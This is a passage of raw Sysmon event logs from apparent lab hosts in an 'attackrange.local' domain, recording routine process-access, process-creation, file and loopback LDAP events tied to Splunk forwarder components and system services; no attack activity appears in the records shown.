16:32:20.958{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246371Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:20.958{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246370Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:20.958{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-5294-6063-C622-00000000AF01}3784C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246369Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:20.958{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-5294-6063-C622-00000000AF01}3784C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246368Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:20.959{CB4067E1-5294-6063-C622-00000000AF01}3784C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246367Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:20.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96B68D6F9603CC77D9789DF52201868C,SHA256=49947DC84B3D4CBF0310422DBEFC7CF7093A929770FB26CEDF41EE542A40770D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061554Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:21.301{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D4FFB96F64675D56878AC163D0A28B3,SHA256=5BB2ACA25A759CAEB5324FC9906709762AA033C7F2055EAB9D6A4A617F76F535,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061553Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:17.865{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54846-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 354300x80000000000000001061552Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:17.865{7F8C56E7-4E4C-6063-2F00-00000000AF01}988C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54846-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 10341000x8000000000000000246396Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.631{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-5295-6063-C722-00000000AF01}2780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246395Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.631{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246394Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.631{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246393Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.631{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246392Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.631{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246391Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.631{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246390Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.631{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246389Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.631{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246388Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.631{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246387Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.631{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246386Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.631{CB4067E1-304A-6062-0500-00000000AF01}392936C:\Windows\system32\csrss.exe{CB4067E1-5295-6063-C722-00000000AF01}2780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246385Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.631{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-5295-6063-C722-00000000AF01}2780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246384Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.632{CB4067E1-5295-6063-C722-00000000AF01}2780C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246383Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.397{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=405B5ABBBB0C9B8C2B2B2D39B51B0B69,SHA256=1C69C607562EDA4E7FF41EC22C957C39833286875928E15CB5A36D707056ABDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246382Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.397{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B4FB447568E2E8ECBD946AED05CFDB7,SHA256=E06EE952263E397D927147CC5FE3458B2F0FCF0D24A3A14E5772D1E9CDE956C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246381Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:21.130{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3BC804EA41C06B3D4ADA4710D61A743,SHA256=BA8634CA24F9901CCF351AAB2D474EDE01FF751A67AB80142BCE589C6C707690,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246426Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.898{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-5296-6063-C922-00000000AF01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246425Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246424Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246423Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246422Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:22.898{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246421Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 